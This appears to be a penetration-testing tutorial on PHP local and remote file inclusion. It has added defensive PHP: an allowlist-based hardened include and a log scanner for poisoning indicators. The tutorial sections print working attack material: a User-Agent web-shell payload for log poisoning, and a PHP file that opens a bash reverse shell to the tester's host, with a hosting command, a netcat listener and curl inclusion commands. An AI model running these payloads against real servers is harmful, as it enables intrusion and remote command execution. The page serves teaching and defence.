File Inclusion
This vulnerability exists when a file is referenced and any code in the referenced file is included in the code of the referencing page. In other words, the content of the retrieved file is interpreted and executed instead of just read and displayed.
There are two subclasses of this general vulnerability: Local File Inclusion (LFI) and Remote File Inclusion (RFI). LFI is limited to including files that already exist on the web server, whereas RFI includes files fetched from outside the web server.
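The inclusion pattern that produces both LFI and RFI, beside a hardened version, as an added PHP example that is not part of the original page. The directory name, the page allowlist and the `?file=` parameter are assumptions made for the example; the point is that the user value is mapped onto a fixed set of files and is never used as a path fragment, so neither a log path nor a remote URL can reach include().

```php
<?php
// Added example (not from the original page). Directory, page names and the
// ?file= parameter are assumptions for illustration.

// VULNERABLE: whatever arrives in ?file= is handed straight to include().
// A relative path to a file on the server (LFI) or, with allow_url_include=1,
// a URL to a file hosted elsewhere (RFI) is accepted without any check.
function includePageUnsafe(string $userValue): void
{
    include $userValue;
}

// HARDENED: the request may only name an entry from a fixed allowlist; the
// path is built by the application, resolved with realpath() and confirmed
// to sit under the pages directory before it is included.
const PAGES_DIR = __DIR__ . '/pages';                 // assumption: templates live here
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // assumption: the only includable pages

function resolvePage(string $userValue): ?string
{
    // 1. Reject anything that is not an allowlisted name (strict comparison,
    //    so '0', '', arrays cast to 'Array', etc. cannot slip through).
    if (!in_array($userValue, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. The user value never becomes a path fragment: no '/', '..',
    //    stream wrapper such as php:// or http://, and no NUL byte.
    $candidate = PAGES_DIR . '/' . $userValue . '.php';
    $real = realpath($candidate);
    $base = realpath(PAGES_DIR);
    // 3. Defence in depth: even an allowlisted name must resolve inside
    //    PAGES_DIR (guards against a symlink dropped into the directory).
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

function includePageSafe(string $userValue): void
{
    $path = resolvePage($userValue);
    if ($path === null) {
        http_response_code(400);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// $_GET values can be arrays (?file[]=x), so only accept a string.
$page = $_GET['file'] ?? 'home';
if (!is_string($page)) {
    $page = 'home';
}
includePageSafe($page);
```

Mapping a short name onto an allowlist is preferable to blacklisting `../` or `http://`: encoding tricks and wrapper schemes keep growing, while an allowlist only changes when the application does. The realpath() check is a second line of defence, not the primary one.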
LFI
Log Poisoning
Log poisoning is where you inject malicious code into the server's log and then execute that code with the LFI vulnerability.
Modifying User-Agent
Using Burp Suite or ZAP, modify the User-Agent to:
User-Agent: <?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>
The <pre> tag is used to preserve any line breaks in the output. If it is not included and the output spans multiple lines, the result is easier to read by viewing the page source. The shell_exec function executes OS commands; another function that can be used is system. The $_GET superglobal is an associative array of the variables passed as URL parameters.
Then include the log file using the LFI.
curl 'http://vulnsite.com/index.php?file=<path to log>&cmd=<command>'
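A small detector for the log-poisoning pattern described above, written in PHP and added here as an example that is not part of the original page. It runs over constructed Apache "combined" access-log lines (made up for this example) and checks two indicators per line: PHP code in a client-controlled header that lands in the log (User-Agent or Referer), and a file parameter that points at a log file, a PHP stream wrapper or a remote URL. The parameter name `file` and the log format are assumptions.

```php
<?php
// Added example (not part of the original page). The log lines below are
// constructed; the ?file= parameter name and the combined log format are assumptions.

const SAMPLE_LOG = <<<'LOG'
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?file=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET / HTTP/1.1" 200 1024 "-" "<?php echo shell_exec($_GET['cmd']); ?>"
203.0.113.9 - - [10/Oct/2023:13:56:07 +0000] "GET /index.php?file=../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 7342 "-" "curl/8.0"
198.51.100.2 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?file=http://203.0.113.9/shell.txt HTTP/1.1" 200 98 "-" "curl/8.0"
LOG;

// Apache combined format: the last two quoted fields are Referer and User-Agent.
const COMBINED_RE = '/^(?<ip>\S+) \S+ \S+ \[[^\]]+\] "(?<request>[^"]*)" (?<status>\d{3}) \S+ "(?<referer>[^"]*)" "(?<agent>[^"]*)"$/';

// A PHP open tag inside a header value is the poisoning stage.
const PHP_TAG_RE = '/<\?(php|=)/i';
// A file parameter aimed at a log, a stream wrapper or a remote host is the
// inclusion stage (traversal, log paths, php://, data:, http(s)://, ftp://).
const SUSPICIOUS_FILE_RE = '~[?&]file=[^&\s]*(\.\./|/var/log/|\.log|php://|data:|https?://|ftp://)~i';

// Returns the list of indicator names found on one log line ([] if clean).
function analyseLine(string $line): array
{
    if (!preg_match(COMBINED_RE, trim($line), $m)) {
        return [];
    }
    $findings = [];
    foreach (['agent', 'referer'] as $field) {
        if (preg_match(PHP_TAG_RE, $m[$field])) {
            $findings[] = "php-in-$field";
        }
    }
    if (preg_match(SUSPICIOUS_FILE_RE, $m['request'])) {
        $findings[] = 'suspicious-file-param';
    }
    return $findings;
}

// Scans a whole log text and returns one alert per flagged line.
function scanLog(string $log): array
{
    $alerts = [];
    foreach (explode("\n", $log) as $n => $line) {
        $f = analyseLine($line);
        if ($f) {
            $alerts[] = ['line' => $n + 1, 'indicators' => $f];
        }
    }
    return $alerts;
}

foreach (scanLog(SAMPLE_LOG) as $a) {
    echo "line {$a['line']}: " . implode(', ', $a['indicators']) . PHP_EOL;
}
```

On the sample above the first line is clean, the second is flagged for PHP in the User-Agent, and the third and fourth for the file parameter. The two indicators are worth correlating: a PHP tag in a header followed shortly by a request whose file parameter names the log is the full log-poisoning sequence, whereas either on its own may be a scanner probing.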
RFI
RFI is usually easier to exploit since you can host the malicious file to be included. However, this requires that allow_url_include and allow_url_fopen be set to '1' in the PHP configuration. By default allow_url_fopen is set to '1'; however, allow_url_include is set to '0'.
To exploit this:
Create a malicious php file
<?php echo '<pre>' . shell_exec('/bin/bash -i >& /dev/tcp/<your ip>/<listen port> 0>&1') . '</pre>';?>
Host the shell with a web server
sudo python3 -m http.server 80
Set up a listener
sudo nc -nvlp <port>
Include the file using the RFI
curl http://vulnsite.com/index.php?file=http://<your server>/<file>